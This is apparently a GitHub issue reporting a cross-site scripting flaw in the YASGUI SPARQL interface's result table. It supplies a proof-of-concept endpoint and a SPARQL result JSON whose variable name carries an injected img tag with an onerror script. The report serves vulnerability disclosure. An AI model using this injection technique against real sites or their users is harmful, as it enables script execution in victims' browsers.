TriplyDB / Yasgui

Yet Another Sparql GUI
https://yasgui.triply.cc
MIT License
178 stars 54 forks

Cross-Site Scripting (XSS) vulnerability in YASGUI result set table #221

Open ktk opened 1 year ago

ktk commented 1 year ago

Same source as in #220

The company has discovered a potential Cross-Site Scripting (XSS) vulnerability in YASGUI. The vulnerability is caused by the way YASGUI handles the SPARQL result set JSON returned by a malicious endpoint URL. Specifically, the SPARQL result set JSON can be abused to execute JavaScript code and trigger an XSS attack on the web application.

To reproduce the vulnerability, the following endpoint URL can be used:

https://rtp7.ch/sparql_poc.php

This endpoint URL returns a payload that includes unescaped HTML code that can be used to execute JavaScript code and trigger an XSS attack. The payload is as follows:

```json
{"head":{"vars":["subs<img src=x onerror=alert('XSS') >a","pred","obj"]},"results":{"bindings":[{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#label"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#comment"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#range"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#seeAlso"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subPropertyOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Class"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#domain"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Resource"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subClassOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}}]}}
```